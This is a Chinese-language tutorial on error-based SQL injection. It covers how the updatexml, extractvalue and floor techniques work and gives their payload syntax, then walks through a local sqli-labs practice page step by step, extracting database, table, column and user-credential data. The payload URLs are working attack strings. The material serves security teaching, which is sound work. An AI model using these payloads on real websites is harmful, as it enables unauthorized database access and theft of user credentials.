1.報錯注入原理
由於後臺沒有對數據庫的信息做過濾,會輸出到前臺顯示,那麼我們就可以通過製造報錯函數,將查詢語句帶入到數據庫中,以報錯信息顯示出來。
2.報錯注入漏洞產生的條件
1)參數用戶可控:前端傳入的參數內容由用戶控制
2)參數帶入數據庫的查詢:傳入的參數拼接到 SQL 語句,並且帶入數據庫的查詢
3)對用戶輸入的數據沒有做合法性的判斷
4)後臺對數據庫的信息沒做過濾,會輸出到前臺顯示
3.常用哪些函數來製造爆錯?
extractvalue\updatexml\floor\exp
4.updatexml(),extractvalue(),floor()函數製作報錯原理
Updatexml函數的第二個參數應當是填寫規範的xpath路徑,當用戶在這個字段中使用concat函數時,cancat函數會將它所執行的sql查詢結果和報錯信息進行拼接。這就是updatexml的攻擊注入原理
extractvalue函數第二個參數 xml中的位置是可操作的地方,xml文檔中查找字符位置是用 /xxx/xxx/xxx/…這種格式,如果我們寫入其他格式,就會報錯,並且會返回我們寫入的非法格式內容,而這個非法的內容就是我們想要查詢的內容。
floor報錯注入準確地說應該是floor,count,group by衝突報錯,是當這三個函數在特定情況一起使用產生的錯誤。
5.updatexml()、extractvalue()、floor() 的payload語法構造
updatexml():id=1’ and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
extractvalue():id=1’ and extractvalue(1,concat(’~’,(select database())))–+
floor():id=1’ and select count(*),(concat(floor(rand(0)*2),(select database())))x from users group by x --+
6.updaatexml()報錯注入實戰
對http://127.0.0.1/sqli/Less-1/頁面進行報錯注入,查詢到用戶信息
環境:sqli靶場
第一步:判斷是否存在報錯注入漏洞
1.http://127.0.0.1/sqli/Less-1/?id=1’ 錯誤
2.http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 返回正常結果
3.http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 返回正常這裏可以判斷是字符型,那麼構造字符型注入的payload
2.http://127.0.0.1/sqli/Less-1/?id=1’ and 1=1 --+ 正常
3.http://127.0.0.1/sqli/Less-1/?id=1’ and 1=2 --+ 異常
從而可以判斷此處存在sql注入漏洞,切注入漏洞類型爲字符型
異常後會顯示報錯信息到頁面
第二步:爆庫名
http://127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
第三步:爆表名
http://127.0.0.1/sqli/Less-1/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)%20–+
第四步:爆字段
http://127.0.0.1/sqli/Less-1/?id=1%27%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1)%20–+
第五步:爆數據
http://127.0.0.1/sqli/Less-1/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(id,0x7e,username,0x7e,password)%20from%20security.users),0x7e),1)%20–+
